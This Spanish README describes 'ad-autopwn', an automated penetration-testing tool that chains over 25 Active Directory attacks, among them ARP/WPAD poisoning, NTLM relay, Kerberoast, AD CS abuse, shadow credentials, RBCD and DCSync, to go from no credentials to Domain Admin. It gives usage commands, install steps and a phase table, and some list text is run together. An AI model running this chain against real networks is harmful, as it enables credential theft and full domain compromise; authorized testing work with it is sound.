
Cadena de ataque automatizada de Active Directory desde cero autenticación hasta Domain Admin. Encadena más de 25 técnicas, incluyendo Kerberoast, AD CS ESC1-16, Shadow Credentials, RBCD, DCSync y exploits de reflexión Synacktiv 2026. Solo para pentesting autorizado.
De Cero Autenticación a Administrador de Dominio — Cadena de Ataque Automatizada a Active Directory
Una herramienta de pruebas de penetración completamente automatizada que encadena más de 25 técnicas de ataque para comprometer entornos de Active Directory. Diseñada para evaluaciones de seguridad autorizadas.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Cero Autenticación a Administrador de Dominio — Cadena de Ataque
Descubrir | Sniff | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflejar | Saquear | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url en recursos compartidos con escriturabloodhound-python -c All Colección + análisis ZIPWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → mejora ghost-SPN (CVE-2025-58726)AddKeyCredentialLink → shadow credentials → PKINIT → hash NTGenericAll / WriteAccountRestrictions en Computer → cadena RBCD → TGS de administrador-altservice, en una fase-altservice$ del KDC en búsqueda de principal → TGT para usuario Linux mediante cuenta de máquina <user>$ creada automáticamente → GSSAPI SSHGet-CimInstance Win32_Process mediante nxc -x; búsqueda regex de contraseñas en flags de mysql/sqlcmd/runas/KeePass/--password*.kdbx en C:\Users, descargar mediante smbclient, keepass2john | hashcat -m 13400# Cadena completamente automatizada — sin credenciales (descubre todo automáticamente)
sudo ./ad-autopwn.py
# Con credenciales — cadena completa
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# Laboratorios AWS / VPC (ataques de capa 2 bloqueados) — el descubrimiento automático sigue funcionando
sudo ./ad-autopwn.py --no-arp --no-wpad
# Descubrimiento de credenciales previo a la autenticación (seguro contra bloqueo)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# Colección de gráficos BloodHound + análisis automático de alto valor
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT para 'root' mediante cuenta de máquina root$ creada automáticamente
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# Cadena RBCD+KCD — ghost-SPN completo + RBCD + reescritura altservice, de un solo disparo
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# Bypass de AppLocker
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# Ejecución en seco (imprime cada comando, no ejecuta nada — incluso procesos en segundo plano)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — obtén el binario más reciente desde
https://github.com/ropnop/kerbrute/releases — instalar en /usr/local/bin/userenum-cldap — enumerador complementario de CLDAP NetLogon-ping (se encuentra en
este repositorio como userenum-cldap.py; instalar en /usr/local/bin/userenum-cldap)asn1tools — pip install asn1tools (dependencia de tiempo de ejecución de enumeración CLDAP)# Paquetes APT
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# Todos los repositorios requeridos
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# Dependencias Python para los repositorios que las necesitan
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Paquetes Pipx
pipx install coercer
pipx install wsuks --system-site-packages
# Binario kerbrute (ropnop)
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# Dependencia de tiempo de ejecución de userenum CLDAP
sudo pip3 install --break-system-packages asn1tools
# Script complementario userenum-cldap (este repositorio)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn en sí
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() se ejecuta al inicio de cada invocación e imprime
un estado verde ✅ / amarillo ⚠️ para cada herramienta que el script toca, con
pistas de instalación para lo que falte.
eu-west-1 — cobertura completa de fase v4.10.0 verificada
de extremo a extremo. El descubrimiento automático en AWS ahora funciona con literalmente solo
--no-arp --no-wpad (todo lo demás — interfaz, IP del atacante,
dominio, IP del DC, FQDN del DC — se detecta automáticamente mediante barrido de subred + fallback
a @<dc_ip>).stannis.baratheon → GenericAll → KINGSLANDING$: desde una sola
credencial de bajos privilegios a TGS de administrador en el DC en 5 segundos.krbtgt — golden ticket viable.--dry-run imprime cada comando (primer plano y segundo plano) sin
ejecutarlo — no generará ARP spoofers, mitm6, Responder ni ntlmrelayx.try/finally con os.chdir
para garantizar que la restauración aterrice en el directorio correcto en cualquier ruta de salida.--no-cleanup mantiene todo para revisión forense.Solo para pruebas de penetración autorizadas e investigación de seguridad.
Esta herramienta está diseñada para ser utilizada por profesionales de la seguridad durante compromisos autorizados. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtén permiso por escrito antes de realizar pruebas.
Triop AB — https://triop.se
MIT
| Fase | Autenticación | Descripción |
|---|
full | opcional | Cadena completa automatizada (detecta automáticamente con o sin credenciales) |
sniff | ninguna | Descubrimiento pasivo de tráfico de capa 2 |
discover | ninguna | kerbrute + CLDAP + AS-REP + pre2k + (opt-in) spray |
arp | ninguna | ARP spoof + captura NTLM |
wpad | ninguna | Envenenamiento WPAD/LLMNR (mitm6 / Responder) |
wsus | ninguna | Relay NTLM WSUS |
pxe | ninguna | Robo de credenciales de arranque PXE |
enum | sí | Enumeración de objetivos (objetivos de relay, delegación sin restricciones, hosts WebClient) |
enrich | sí | Batería de 13 módulos de nxc (LAPS, timeroast, MAQ, nopac, zerologon, …) + consumidor automático |
bloodhound | sí | bloodhound-python -c All + análisis + cadenas de acción automáticas |
roast | sí | Kerberoast + AS-REP Roast |
adcs | sí | Explotación AD CS (ESC1-ESC16) |
sccm | sí | Robo de credenciales NAA de SCCM |
exploit | sí | Explotación de reflexión/coerción NTLM en un objetivo específico |
dcsync | sí (Admin. Dominio) | Volcado de hashes del dominio |
loot | sí | Cosecha de línea de comandos de procesos + descubrimiento/craqueo de KeePass |
tgs-rewrite | ninguna | Reescritura offline de sname de ccache (bypass KCD estilo tgssub) |
dollar-ticket | sí | Ataque de reintento de sufijo $ del KDC (objetivo GSSAPI Linux) |
rbcd-kcd | sí | Orquestador completo de cadena RBCD+KCD (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | sí | Primitiva LPE CVE-2026-24294 (SMB-en-puerto-tcp) |
reflect-loopback | sí | Primitiva LPE CVE-2026-26128 (bucle de retorno Kerberos mediante SPN Unicode) |
kerb-reflect | sí | Reflexión ghost-SPN AP-REQ CVE-2025-58726 |